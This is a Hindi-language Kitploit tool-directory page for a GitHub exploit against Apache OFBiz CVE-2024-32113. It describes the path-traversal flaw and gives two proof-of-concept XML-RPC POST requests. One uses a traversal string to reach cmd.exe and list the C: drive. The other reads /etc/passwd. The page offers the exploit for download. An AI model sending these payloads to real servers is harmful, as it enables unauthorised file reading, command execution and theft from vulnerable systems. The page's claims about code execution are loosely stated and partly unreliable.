Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Apache OFBiz CVE-2024-32113 के लिए एक्सप्लॉइट — क्राफ्टेड XML-RPC अनुरोधों के माध्यम से पाथ ट्रैवर्सल, जो असुरक्षित सर्वरों पर मनमानी फ़ाइल पढ़ने और संभावित कमांड निष्पादन को सक्षम बनाता है।

रिपॉजिटरी देखें
16342 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache-OFBiz-Directory-Traversal-exploit

Apache OFBiz 18.12.12 तक के संस्करणों में एक गंभीर (critical) के रूप में वर्गीकृत भेद्यता पाई गई है। यह मुद्दा एक अज्ञात कार्यक्षमता को प्रभावित करता है। किसी अज्ञात इनपुट के साथ की गई छेड़छाड़ path traversal भेद्यता की ओर ले जाती है। उत्पाद एक पाथनाम (pathname) बनाने के लिए बाहरी इनपुट का उपयोग करता है, जिसका उद्देश्य किसी ऐसी फ़ाइल या निर्देशिका की पहचान करना होता है जो किसी प्रतिबंधित पैरेंट निर्देशिका के अंतर्गत स्थित होती है, लेकिन उत्पाद पाथनाम के भीतर मौजूद विशेष तत्वों को ठीक से निष्प्रभावी नहीं करता है, जिसके कारण पाथनाम प्रतिबंधित निर्देशिका के बाहर किसी स्थान पर हल हो सकता है। इसका प्रभाव गोपनीयता (confidentiality), अखंडता (integrity) और उपलब्धता (availability) पर पड़ता है।

परिचय

  • CVE-2024-32113 भेद्यता एक विशेष रूप से तैयार किए गए HTTP अनुरोध को भेजकर Apache OFBiz सर्वर पर मनमाना कोड निष्पादन (arbitrary code execution) की अनुमति देती है।
  • इस अनुरोध में, हमलावर Apache OFBiz सर्वर पर etc/passwd फ़ाइल को इंगित करने के लिए ../../../../../../etc/passwd पैरामीटर का उपयोग करता है।
  • जब Apache OFBiz सर्वर इस अनुरोध को संसाधित करता है, तो यह etc/passwd फ़ाइल को पढ़ने का प्रयास करेगा, जिसमें सर्वर पर उपयोगकर्ताओं के बारे में संवेदनशील जानकारी होती है।
  • इस जानकारी का उपयोग सर्वर पर आगे के हमले करने के लिए किया जा सकता है, जैसे डेटा चुराना, उसे संशोधित करना, या यहाँ तक कि उसे हटाना भी।

Poc

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

या

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
टूल डाउनलोड करें